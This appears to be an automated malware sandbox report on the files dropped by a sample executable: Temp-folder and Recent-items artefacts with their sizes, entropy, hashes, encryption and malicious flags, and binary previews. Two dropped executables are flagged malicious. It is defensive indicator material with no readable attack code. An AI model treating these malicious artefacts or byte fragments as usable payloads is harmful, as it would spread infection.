                  C:\Users\jones\AppData\Local\Temp\wct150C.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997822920015891
                  Encrypted:true
                  SSDEEP:1536:O5RrbIAchmEmYXSdPxNbvOw5MHGXaVJmr9c4R10g0dadyeS:O5RXeAzxPxNa90JmS4eS
                  MD5:FA288DD298CBFBBF82FAF7F94D4DD4F0
                  SHA1:8CB57351872F5CA0D7B456A84F59EC2B9C7EFABC
                  SHA-256:4C0C74980A2D1DA9B1B828042813CB3A886BE3029F8BC4BFA50DD37A3BB034DF
                  SHA-512:ABE1299060E90980953EB21629090EC1208FFC85845E1828AE3956E28808EB689FE24A7EFC94CB29DFE413C075E48E1AF90FCD2116F89C2CCA1FD1860B6FC617
                  Malicious:false
                  Preview:{"ram..o.d...\..+..b.'.d7...XRBj....)x....x;.....x*./Yp..mI.$[LT..........'.&(.}.S..-..z...Er.......d..r..<....1h....P.&...h.}...i.j.%.w....7.].j..f....]..Q...i....?$a.V.../[..v...|_...J}....&..G.u.0....@...>#_H=....u.....t./.h....<.9.X...&8..1%.F0.v.)...-.]..,..Q..&..l*..,......MLx.}.e...u.e....m..r<...v.O.H......%-[iS.Uv~.r ..q.V.XVV.E.|.....s..t.R.My=spn..I....(e.....`R.&.....j......P..V&....#....E"...;...u..7...7.......a]...^.=...]..Xw..!!...(....N.x.3.IH~..p...G2.n.s.K.a..5.$WW.9..46...7...o....J..,,..&..."...bB.........q...1.n$.x[s2v........d...O..._.5a..6.T...H.;$.e6.|.$:..M..h. 1.3.-.X..i63>0....z.h....;..5<...J....3.K(_.w.....J~.h>e..a..6.a.[.x.y.5-.-..h..F.{.kW8.c.!.i...y. ...V.N.kX..6U'dLEwl.r..,...5.`...pi....x.........0h...5...]..e'....@..u...m..t....CU..,Ge..y...m.4/k.,>....z.:.......I...=.h..3...pQ..R....0.).?.M..OSI.....y'=...=U+Iz..6..n0.\...C.9._.a.........(F.EoI....<..'...'.....9.X.1Dw>7*..2.2.!! ...|/U]....8l...S.2..aWG.

                  C:\Users\jones\AppData\Local\Temp\wct38F0.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997725364221006
                  Encrypted:true
                  SSDEEP:1536:EeRSwyomU1/nPynyEX7zVGyOmN5Mtmspgu+ZyBHKzmh9:92ymVGHs5Ms4zsh8
                  MD5:7BA4DAA574DC97FA4914919D4BEC61E1
                  SHA1:22893ECFCA1889DAD509DECCB9894B1AB358F8F3
                  SHA-256:B502233BE77A1F5818C2097F65F01B71B34FAD1EAD5D39335743A0695D6A337D
                  SHA-512:2F0CE1763C91E2E5C21AB2FA64C5BE982A8F8E32793514C81F524C015B058326E12B3D9422C73601456764C2BE9B36D0154D7A05796F761FF292A1880DA5A114
                  Malicious:false
                  Preview:{"ramfsX0.........Gd..E.....O.+....~.....L.Tm...A.i..c$.1.)._..e?...O.........|.t.5S........`.!B......q........K....,^.3~Y#k....E<..{."~..X.@.G..dX..bY.s...zI.'."Qq.$L.t.f....=....4....[P...g..{.."mdL"[._...le......`jp>=^_....uf....~Rmn....Fp.v8>Q..~/zd.....p.C...b|gu.8.xl...!!5}....@.'...4..Nt-8..9.&...%..vm1.,.d.I...$.......fe...".n..Zl.E.Y.....8..[...*..n.!....Hi..\........e....W.o:eK9... .3...YZ..-.FqC.d..$.s..TZM\.W..K.....C.6~......8i..cl|.8....T........R...].....%....A......i.....U.:.....( .l*...3hvh..De..,..7..F.WS).W...|..[.@.;....V....\n0V..Z.....2.?..8Jr....D.#.O|.t....".1........6|...F!+U.95p.')rM<..{..2....&..9.EF........_....)[.Ek....h`...t:..........w........R...B..E.`u..g7j.......[`.b.,.GM..N..y...D....[:....c%0D6M^M.M%.5..6Y>.8S...D8.j....m....k.-...c.h.....O@)....g..H.d..ZaH.'.=.`.._E....mo..z+.Sx...^Nb........._......{...58.u<.M../..-....*.e.H...U`....{Gu.I.......pc.R..>.,..S...'..M....u....yU]...s...=.mC.Yd.r.

                  C:\Users\jones\AppData\Local\Temp\wct3D66.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):1601198
                  Entropy (8bit):7.987444428387669
                  Encrypted:false
                  SSDEEP:24576:sCrp9QwU70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:11i24gQu3TPZ2psFkiSqwozJ
                  MD5:FD04351634C316F609E3C499CBCE51E9
                  SHA1:36448EED9115F7E28BF2754CF155DEC024513A52
                  SHA-256:E400A9844E62C6A816C5F7F69746981F6C6FCDC73231FD3F24AD48783A9FDC14
                  SHA-512:9BCFCF5C54F5D21DD807FE03987EEB9B1823D2E59921AEAA8E60C87C8F68F2063ABD6F865CB8004B73621FFAA411C6DC706F3D45A026DE77134BCAA4295D9C3F
                  Malicious:true
                  Preview:MZ....&.T,.'...r-...K...p.]4....u...>.....`.S4...(m~cu.......XDt.~v.3A$7.:..O]F....=.g2......Y..K.q^...L...O...{OOL..%...".....D.]...C...A.0.....[.t\.7.Av....f*....!....4...e...^).(...]......5..h=.S..:..k...*....a.PPU*y.^.C. aY9.}..$.".4;?.~......g=....9./..5p.....)s_...............r..0<....3}.-..[..........UA....9..#..d..1B.jr....s...4.........E.\N....[g~B...w.M...MH.>.......P.....\.;..E.d....1.H......`...;D.{..y:.g..........0*..<.D....&4..,O.jC5.2........(i..~..\F.a$.&...b.k;.->q..i.m>.^.NH.L.p..y2..@N/......A`.<...,.N.....3.....7m.?J.?'.......7..y+B8........4a....+.R.@...'{...=......,.CC._...x1.F.K....3....0Em.+,I*.$...<.c...m......Z..;.ah.UVY....d.`.:....../...H.$.d..|p..:..d..E./b...4....K..W&%...Py.#}...c.IEM...#..pK.h&.!..[a.Y.}.C8..W#..f..}a.K.rH...-4.;..iQ.[$(~...K.i.F...@C..`M....Q&..........E......o.~.J....L.e.....+6.I....._`.c...a......h"J=.F._C.'.Ir..........h....y.k@v..<Gf\#.{.WYy%J.,.o.(..z....|....T.....I.,.[.Bk.C.Z..W...u.

                  C:\Users\jones\AppData\Local\Temp\wct49A7.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997387944496603
                  Encrypted:true
                  SSDEEP:1536:EXl3vF8WUhhD4XSZuUEbPJsrFTZ57O1hN8BA+pWvWNbGIz:m9KXhhDISgU4gF21h6BrpWvWxGIz
                  MD5:C57A3AF015483A9DE51D760DAB979707
                  SHA1:EBBAA2696BAB1041D45B130521C4E376147188BB
                  SHA-256:721DA5AC9497E177237AF5A259FD28CF0845FE56C9D9A436EFB1BF8788094BB3
                  SHA-512:CBC9D73CF2AC624CFEB2DB8EBDE05CB110E2EAF70501FFE783E5BB15BEFBAB2205E74E379AD76DE133ADA1852A6797A803321F956D07E3EB7358723D3570A521
                  Malicious:false
                  Preview:{"ram.I.>...0.....F..{..V.h...6.d...Ij.....a.v.5..5.u{...P......M0...:..C...}zH..9/.R..W.........._.._-+G....zxd.g.@.#M4...e...~..bz.ss.C...m.T.N.@.............@R.....j.P[ZG.N.<.).....8ke.\FFWa?.N/9U..k!s&a...\..XZ_.6(..I]......9x....U....)R6.N..t..[.o...>..(............~.=.h.kK*.r3t._.9fjA.Q$...:-.79.-...3.g..$.8.E....d...8..D....{.87..L6y.M...].2.U...6...mB....l.........]+...qBb._.....3kB.V.6.$Z....x..[..M.....>l.....$..."..!.dl.s].0y..X.&t_...d..$8..'...]M/...y....l.Iq.O....4...E...G..$....L1`GF^Lo.h..x.:...e.A...o.@....K.....q......u. ..T..."../Mk)5.....Y}M./*'.VQ&...O<)e.6.p.zE.....E\.e}..l.8..K.&.>.E\.*........{.........-zE.c........onv..;..-.!.4_..~..........r+..5#..`. e.SX....Z!C-~#..3..b...G.<.*. e.b....,.]...VI......$...g......u*j.....l....`.EW_<.3l*K:b......V.}.........:.o..j.K ..V...%...~.t.....*iA.a...9....................ur....4...:..S.|].[;..4.....$..w....mZ..&8..7Kk .|..l.C....q7..b.~P.K..iQ.CE.k..x....qn...S..c.G....d

                  C:\Users\jones\AppData\Local\Temp\wctAB5F.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74525
                  Entropy (8bit):7.997621766829726
                  Encrypted:true
                  SSDEEP:1536:Crw7Jz7YAZQdnmVBWPyPlymGiNnQ5soZhO3l0/v5e+d:yeJz83Y6PCyriNnQqoDO3l0/vVd
                  MD5:19F214398A99EC94207DB71D34A78D8C
                  SHA1:4F87897C8F3E7E1539A7927AB33E81E15DC02A5D
                  SHA-256:05B7A22E5D260E9034038D46F1EA7C93F447FA5E45999B737C21212F745F6408
                  SHA-512:1525E6796E4D030E4F04B529AB2BE47876BC098B785AFECDE8342889028CB05EEB9B4B48C1E4630C5FEC3F3DBB55D657270518F2EC3DC86EA0243B7300123085
                  Malicious:false
                  Preview:{"ram2V....l..I..r`.v.(.J]&.A......H...k...".E-.T.....>#....z6.....`.....xf.^]..!..fc..+.....s.*#......O$fS;\.'...Y...1.....s....>.t...%..tf..Q..g...M...{.,.......#.ddZ.h....I.Yr.d..4..p+...L..vN.!.F..aU..z.r.~......?..W..m.....C.'.0dK..id.R.b.U.E..6......-..k....t.._.O..O..om(_.[...v....J....I.5..Uf...@"}.d...t..5..9F.w..<......q..*o...S{FP{......|.q..O.......M....Ne..xa....'y...:..P.....<...KzUC.n..}.s.O.h..k...........a......Y}-.;.........WX.]..e.oh..K....&...z.......G.j...sB.p>.+SE......Bo..{....n....&8...'&z._..].|...i.|Z....:.~.w..Jh..Pi...8...#. ....=R..X....$.lc.....f...[.K..R.v....M....g<[...{.q|..g...}..Z..|....,..]..`.=..".......Oe.t.;Ml.>7..`...(.3.."..."SK|A....9i\u..w.#P....h..w....;%.cw.\$.....p.3.X....I.a...l..mV...q.6s.>...+.U;.4*...4{..r.3.l.D.."...w. .g....Xa..`Q.H*..Z....].../..P./.)..V.~.T...v....&.c...&1...l2\.:..N./n.D..`U....0..M..B.m..9b.0...eY!F.dq\..@..f......px..#.}.........k...........>... U...d...

                  C:\Users\jones\AppData\Local\Temp\wctDB2E.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.9973468161823815
                  Encrypted:true
                  SSDEEP:1536:5I5XSoTTitd3wZTT7cMob5aexdkA5+0ZFxURqQsKEH5H:5I5XAd3w2Vb51x5HZFxoqQsKmV
                  MD5:D9DEB35C91788A53A2223E19F870C87F
                  SHA1:B9FB1631F9AEB307BFBB10D10056CE0E04DECE13
                  SHA-256:21E76F63FCF74E2A836B529BFFEE712CDDC76E7341A349B527205D65C61F4831
                  SHA-512:218192818A5294DFCED3031703DF9E34FB5147E3D1035764D0552684F56D7660ACA0BAECED0DCE2BC1CA3140308ECBEB10442CBF44062313C2592B51B9F167B4
                  Malicious:false
                  Preview:{"ram..yA.^+.....H...@N.o.....rf.?..AE..5ry...Z].~.A...(......@...Y..j.P.......`+pO..9...[+.YG-....?.U.<..Ah1.k`:t.......,.+.'...MP..6....}...N=.Q...=[...=.L.&....6?pu..zQi......~.@.0..rV.;.Zk....m<.. J.JO4b_.#..;._"|...h...7....9T.....iK.M.D1..]N...,Q."w.4.k.:r?j..(.Q/))....wd.....m.l`.X...^..X........_~...D#n..^}..S.........r.5....NY.....a..v..sM^{....M...r.q....8iE&...........+][........'...Z.Y.`.{.p....e.....h.*..y..1..8.t....C....~.]...o.e.r..R8;l.. .....~2..~........'..3..4.).Og.k......p<.C..2V.x.....w..3.C.....J.'.%..Q......i.c5p..RC}....YR......T...C.!.cq.|b...Wm..|.....O...K_....'^....xR...E...4...7.OG.....<.n......A...d.....j.~....TE..9....c v.v'...3EW..>...). ..*..R..qe...U...{W{4dooCV.....\,3...w6.`..X./u~h~...qW;.p....._tGc#r.p..M...[WR.?.a....3{.7`4L..s.\.$-"....x...c...o.B.^.A..t.Ea.Dn..]...t......y.@.v..x....GB........7..<...z..).@;..!6#.r.R....pA.%A.).....1..=}..d.......rx0).]%..R.&..f.6.?xhq.].... .......)....].....2.[J.!

                  C:\Users\jones\AppData\Local\Temp\wctE4A4.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74525
                  Entropy (8bit):7.997327669413282
                  Encrypted:true
                  SSDEEP:1536:K0a8gyew7pS3+UDYcV0lzCv5n6BqE6R3H+xQm96IhOlw:ow7pS3VlxRn6BFw3exaI4y
                  MD5:0A8BAD591E2549F024C533950D06DB1A
                  SHA1:6AA0A1F8D60868755CE7CD231423F7ED5C0F373C
                  SHA-256:81A696E92A550C92858F9FF4794ECAF809A4312E0ADF494EBCF204B47D7DE02E
                  SHA-512:D7E1453CDC25832DCEC55D12CC310B78B4561D3354CF5F28013151DDBEECF93F04232A1DE7452DFC47A641F963449A9E7C34B86774599809547E10E4D3C4C114
                  Malicious:false
                  Preview:{"ram.h..! .....}..{t...P.`.$.....MC........P.Z........L.[...<+.PJ..N.Z.>...*...$..S.F....U.w'.}5.......E.9.....:......(...-...X.....(.........=.:}./.hU...&{..@E.....u....hK.eN.......ib.\@:.v...kd......yG..,'JI. *f]&^...l.z=.g'.:n-z.Jm.4..>..B..W..jx...2.H./[^........Z...k!...../Yb...7Z.^............A.ns.z...j...r.i..`..V.>O...2.Pd9.=<.T..N..5X.|.w=.a....skmJ..B5.1..1!.....&p...a.^.?.>.tBc;.!\4'3.s..O.K.w..K$fi1..:xj....-..u.....CA...;M..r..+..m'..\..C..{BRT..O..(....I......-*..j[.E[q...gZaT.;.<...cOV~.s...x...2...!...........A......Y.....O....D78...cA8.N...iW=.....L..b...pI..>....t.9{..v....y..U.Z..B....4..$.5&z...(..K..l.\.E.3....[........*D...V.....5 ..-;)..."..x2b........E.....g....|..v0.|..".xI...CM'v....|.6...'..%F.Z.!T:...O.J#^Ae...U../...8X..J.4.b...Z.......Q.....C..`..~..OO..x....m...:|C...f."V. 0D.A.|...!...g.~U....Q......).-....e..rW..2.=...*..@O...j.p.}T.....7.0gt`...$.0<Y.......xPi.G.i<.....(SZ..K.p.\..0<._rr.f...;G3

                  C:\Users\jones\AppData\Local\Temp\wctEA40.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74540
                  Entropy (8bit):7.997635543061449
                  Encrypted:true
                  SSDEEP:1536:uxzhr+9cBY9w8eDEm6cVQTqZBABFLHchiktUlwDn7:ez3q9zr9cVQs2FI7owDn7
                  MD5:71E886DA676066D5274662FF896F9118
                  SHA1:3D8D2DAC4B25B277C8ECE86ABCE7B021897000D0
                  SHA-256:A30557E6EA3785555437FA840322C4C214C1ECE6C68A91ADB26EE82AB5D455C3
                  SHA-512:0DAAF99AC83283652D764B4D5E99E1D07AEB2712D2744DBC4CDF911B14F3E77F90939CB8F145A98B3B2610710AB23E6E914C122B473557EDC774209082E8E533
                  Malicious:false
                  Preview:{"ram/e}./..5.P...v... .4M....OA1.....x#..P(-V3D.:.7.../...~].kr.....&. ....A.Li.Rl.^..[..&..+..4.Qa.....<........q.+i...E.$).......=.5..m..:.*...CU.OJ5o.f3..Ltn%V........6..4...n~.....Q.......a.].....P........4<x*.e1.._..a..LJ.b...#:>,.._0.J.s..$.*.WM.. ..6.....Dr...3.H.6s.}.P3.......U..<.&.Y...F...q.T.+..l....b.>...uE.....8....I.cT.....h..W.E...J..p....{..[..|.(...e.4.i1Q.8...'.u....<.u.P..x..r...%/M..*5...0..%.x......4yb8.I...=&qW.0.P<h!..I(..2<9....;]G..%...p.<#..=t..OW!..#a.....T.F.<..v.H.N_..w....d.......H.\..4q....qH.@..jG...*./.q....].O<.>..o,3..sj..QZ.Nt.N._.B.19_..-....R....2H.BAl#......K...N..f..q..0..ws......*1.."..&Z<2.XdQ\.i...a...o...<.Z.......f".b...E.T..E.....G .q.JX.......2.G..GD)...4..../._G......R...lw.Tv...#^...RH........9$RD.dPk3..l&C..w.iM..*o.s..N..>..*.;E...Y.R.n..f(.\{N2........}../q...o...!.Q......t.........?"...Ih..~.fF...}.&C.3.X....9..n.U.....[4H!/..7.....!.A.....y4.&.u.[.u=...G_..!.S/.C.N..^^?.5...O.<j

                  C:\Users\jones\AppData\Local\Temp\wctF86A.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):42164934
                  Entropy (8bit):7.9476699167460305
                  Encrypted:false
                  SSDEEP:786432:OwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59G:HQcWxDMPnN+dk65gGUjku4vNjLjG
                  MD5:09A557E31FC888DAEBF2FB08F2118DC3
                  SHA1:BE8F2396A135C451D02D400CBA880A65C60565EF
                  SHA-256:6E8C9EE6B7261002F934020887A3824E5859F595BCD20F06E19DA1C03FEA5E51
                  SHA-512:02DED5E69789ABFE93101EFE60FEC2F5831E483427C2EEB9A00DD8FF8E19E64F2419099DE27320812AA3A4FA315E413C4775733A2E016F7F60F6379287EE2A8E
                  Malicious:true
                  Preview:MZ...yN.3....Tt...<.Y..0....Wd.K.-..B.....V..L...@....;..'...3B6.F...'.VT.,...!..W..yjI.a.s.Ev..V.*4...,.z..`a..CB;h.B.E=......./..../M.....2..K..V....}.zJ..L.~..s..M..=.2.aQ.)of,...,.8.-p..=..J"...o.t.~....Rr....pg.8..b'..q.F.Zy>..B.c...V.....3.V.'y.............{Ml.... ..2...p.Y6..^..qU.)..Bv.).mp.X.{.).0.4Ih?.....p.iTk.=].=.M..?0..."'`..Y...n.6.=3F. .nD.c.X..:....cz....!h.2...+Q......u...:...ER...jA......]....=..s/.f&.....|...X.tZ@.."Gm..7.W.R3.....~...^.2..Q>.r..:QJ.NqbU............v.V$....Q!.0.......>U...J..u .;.[i.hn4Q..0...r...w...#.O}.h.-...'{...JD..o..N|.m.8a.csQ..=.gN.0./4R....4.....7.-....D...p.]_H.7........@.y......?a._HuT-..0.'.g..x.....9C....K.....F24;...|..A. s..fV...$.r.[....Z.r..L[t..H..K..a,4.O.^..,..;.Gvvs..A.;v2VKW..F.k.=.. ...#e.m......n..#.N............q'....yD.^ .W...f"....<.....n.S.kzT)..;h.>.....B..P.2...1.!.R.r`...X.C...27..B.K..P...aw..d'.K.oA......`.WG.GrBO.6.q.Dv.g...\...N..*...j;..1...B..+G...m.#]Fr.2(...tL/....k..(.

                  C:\Users\jones\AppData\Local\Temp\wmsetup.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):7.806310167000348
                  Encrypted:false
                  SSDEEP:24:tv3kr0bEuh53PZYKEsyopeHer7HO1XBMNz4nztCE9Q8z7ksYo43zbD:OrmEuhNOK7yopKW61RMNz4pCE9Qik/3D
                  MD5:38F825A4277DED31C811B1E8A953BFD4
                  SHA1:C8A7AF4EC2FE90AECC7CE2C9641C558EBDD46A31
                  SHA-256:E06E1EDB1CE0C60F48B4509065ADC60BF20CECEF4827E51BE69DE9A4E78842C9
                  SHA-512:AFFCA91631D5000F7C23DE9CC2D51C9F225D4853B2C0D65EC1D03D6DBC7B4062EDEEA7DAEB05C1742F883694E19A3E1F7A331EE4A59349EF6AF3F0F60A588F42
                  Malicious:false
                  Preview:..[*W. ...:.~\m..D.gp&O..;d..n.9.........l...l5Z..w...pX..x'...o.k]10.px.n..&....>{.+5...^.cv...^....N-..lb.'...fL(.........0...5.H...y.`cj.!'i.Y.;.R2.<l..^^e.rS.P...|.....w....]f?.=....Z.o.ON......,....X.....K....N.#c.[.t........&(.3..OQEr@..,.V....$.x....*...r\.3+'}......,...B%...E.k.<R...h........ .]:...~.j.L....F.$.......!..*%.lZN"S..%.+.d..8..^..8....P.{..I.~.)].E...43.2Td.R..)...qo..C"..%].<M~.>..{."c.{..a:.[...e....%&3z.l."..c..z.~...v..Nq..d.^;...y'......U~W#........A=..OWj..n.S..W.....l../..5g....@...6.....3L...D......r..$..E.ai.).*D.\>EG$..Q....y?....)..Q..fl?...!:..;.;..|.r..Q..;......a.B.(....]:L.....Wv.^L.H....(.?..m6@....S....b........+=h9..<.p.u.U\V......z'.IF..J:V........Zi.7.)..3.!>...<.B.fOp&..R.h.._....~9I.G.........~..8k5...x.q.{.9.`..&.E b..0.7-$].F....W...6.6...V..N...C..^.....[...n.....BC........z...?E.G.4~..._._w.Y.~L..a.R3.c.X2..*.{{..t(.......f.....Q2xGgm..i...N.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698

                  C:\Users\jones\AppData\Local\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6130
                  Entropy (8bit):7.971225713702486
                  Encrypted:false
                  SSDEEP:96:ZLo7e+ZMyC987SObx+IHDLydpzGd/I5aTABzXwR/f01ZaPyw1Z40et6gp:VoS+ZMj9IfjKp/mRnM0A5
                  MD5:D2139D859153496EF36CB45D9933EDE9
                  SHA1:4A9D965F47E4496E991C572483425E720336C64E
                  SHA-256:E3CC9861B905D6866931D831337ED427EAA2858610A99288AAF6447EF14347D8
                  SHA-512:AE09C14BAC2DB1B4F9DA65F67B40BF125782CE88B337710121121D421FE8CA186E21A936895C9C6024C15838F33CC39DC3D65EB879468129EB2A0F3B0CCE2415
                  Malicious:false
                  Preview:.PNG.L.@.@"p.H..]+_......M...s.o.o.y..ek...F!C8.%..Z........K3vm..%......U.......^#........$.D.......7.M#..1It.w.p--P..n......T.... ....84T.0:".(.........{.d..1s"...R#H...l<s..l%*..d.../.c......l.r..E#..<..4...TM'.~yw.A.e...e...P...k.gV.......6...B....rx...<Tl..T...6o,j)..|.?...`U...eu.cL......I....t#..~'.:n.-)....W.;.*..w.h...f.x|.D.Gqo..X..S....3..dCC.9.9...QgGk.a....by. .W.J.U#0%.Y8.nB....W.~j.T..)j`....?V5..=J.]....!K....T...U..Zo..;.}.....jH....u-.O.D...8..f...=&d.'a.. mr..K2RJ..M.?3..........+^V.f..9.*...I.&.K..7#..ei..G.0.s.....t|....@t...R...A...T./....V|p.32x.-...L......B.I...~..F..CUN.c.z........S.OYr....=-.>pf>{..[(..[.]Q........=.'...W)..N.....`6...4.p.-...]..w..P.z=.!.r|%.#CC.k.+-..R..`.B3......[;.R.....E.D..9..nW.D..\.S....jx.....OX.......^P.C...e.0Cb.2....M..E.:GW..0..9..".<.~_.'.BFM..).'.I....A..i.....?3\.......S.y.t..N..2...:.`.v.......,_..2e|...e...W..^B...##.......+T......A......q....!.o.V-.%.W.C/.......K_T....?

                  C:\Users\jones\AppData\Local\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6130
                  Entropy (8bit):7.967348074396973
                  Encrypted:false
                  SSDEEP:96:daOScvm6jrCejRXBTk09IvM0OKK1Ylrnc11IUWI0aTwAEVWF5R47W69VZZBMNxA5:QOScvbieNBTkaOMB91inQIUWATwgjmjD
                  MD5:61C5ABC38759CC7D91A0FF569EFD7185
                  SHA1:5C7938B737C0F53EDC4C44C4AD73AA438985B4FA
                  SHA-256:2BFD1FA24EFB44A30A20037A66FFE438FAC3B8BC7DE8F577B3FD5AB79846CD44
                  SHA-512:2A088CBF817EE5E37B9A876F5E4230749D802212314DD6EABE6A3C49304EA4BFDB510CAFFFDCCC8F6B3DE9A774ADAA0C2E8A674FB58200C937F5DB6507AF9B5C
                  Malicious:false
                  Preview:.PNG.0[..X.e..)=.Hy ......J..=?...n1|...%|..b.....I.4S.D,..bFa....@.....%.~.:`$.LjA......|T.....e..4...e.........}N.b..N.o..o.P.+.....>...jm7...|.....fz..b.+(L7.KZ..-o_2Y..~...z.>r....E.f.K+..?.UP^Y..i.5.......> >.YH.312.E...0.Fa....N..&k8k......RJ..W..D.. J!.;.t.L..'......a..$$..K.yG.1.....KsR..L.iK...X.9.{......2......h..!.O...M..6..0^....c..>*5.L. .n|.....f.|}. z....6P~.}\..x..`t.Q.YU...D_[....g.o.....Y...sA..p......>...[.....^.......B..9L(...TT......J.KQ.TZh...$...z...Oq....LY...*[..o.....=.et.....X.1.'.hu67.@.A......>.`...&..t.....bi...|...5.....c.b.^..(..'...F....>EQ}T;.R......:BO..yF..`.../U=..u.2W..2@.So.Yq;4"N...fY..%Q...Ua..b}.'..I...@.m.y..,.e&6..o.0E...8.y].buP......V..P.......M.G...+...F@Q n-.U.E....Z..Z4[y..x...,..G....?...C.1.,-....e.)..cU..j..@m..L...i.... N.E.0.g....pN...UM.;..[C.....(.....iK......L.........';x..K..8.. U..........h3.p..i...f.......Aj...;......vs,c.-.....tO..... ......G...CK..H.$...`.....

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.9450750667938195
                  Encrypted:false
                  SSDEEP:48:3whJpcLgBAdOq3ZzwbSYYGSxk7BPIXoq0/PTQqLZNAwI4sfaPPMadJDpmltS3nD:3KJmg2dOQZzwbSYek7SXoq0nTQ8NAP4j
                  MD5:5194A773EDD54A94ED9805210E1EED36
                  SHA1:647E93AAC407809EA61D83610697C2326FF3B1C3
                  SHA-256:3762ECEECD150FBBF26DF9691544FE679AA2257795C0634F023639512AE7DEFA
                  SHA-512:4131B80A56FD4AE7FEC03D083EE9BA69BEB9EEB3A2D8F2997A7B9B014E678882894D15D57EA2E6152F23219827AF30D6A72818112FC1BDAD2D3F52C734E4819F
                  Malicious:false
                  Preview:....I..........#d.n.......C>.W.[..5S......`..?..P.)7./.>.._.[t9.J.V...."...6I&Y.;...y7.7N).i9......9.:..%..n....k.{.JM.i.xLv...*...5..1.-.S..`......'i....u.n.h..3.'f...n....P&..W....06...B../.....6`q.[..@%......?.b....:.t.k.../.$....E..s...3O.l.u.rp.(.^`..c....f.X..dSD.....8.`.R.v_:.>..6..W...M|r9.?2+..u......V..I.p.)..>.......i....oZQ..#...\.f.O...BrQ.m..:g.-?...#.........#A...4.7......%..s.b....\^..SM>..K4=..\..w.>....z.G.._E...O*..E..}...t.............%y....".Q.... 9`t0..5Q5;..H...1..v..$.t....3;..Y[o.....3JV.}..,.wy....`2..2.|.m....(...3.=...(uh.Bm...]...*A..sB.gk<V]....0..+[.&j.....z...=...u<....V.....n...1)..\4..P.)..hf..!.Z..a.=u...9.+..j...#.......RL."K...22.v.ea>...nx..,]..%G..#.nl.E.r......:'..#..]s..@}.?,...;..N...T...@.4*w|.....<....=.3..v..'..7..T.Sr.@.....N.m...]..k...........=..[d.....>.i...x.b..4s}.A..pn......,..l...}.......,w.D..v...[p.L.F.C...n.......L1.4.p..."...UE...5...T....Y].Y.ei........c`..c......... .T"..i..~.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.960403613445905
                  Encrypted:false
                  SSDEEP:96:ofFAfWuC425S9xFp5PDJYtik67hd12N6ZsMdcl27n8wojxzT:2+WVS9NrSik67D12N6yMdckVoh
                  MD5:519D2E183101DD80363363D111E4B440
                  SHA1:6950AE6401791AC7BC3B115A862A68BD4095A0C3
                  SHA-256:BAD0E3946B1FDEF13870FBB2C6DE0DB9BC67089CD0E014E9D8BCDD0607DDD4E4
                  SHA-512:7749EBC86EA0B4A5DB1EF257BA90DA493AA44240422D7609D3C74316F7E4729D5AF704CAC5DD129C20B4346852B74F0D4CBB77AE5A3E839C012754CBCD1CE919
                  Malicious:false
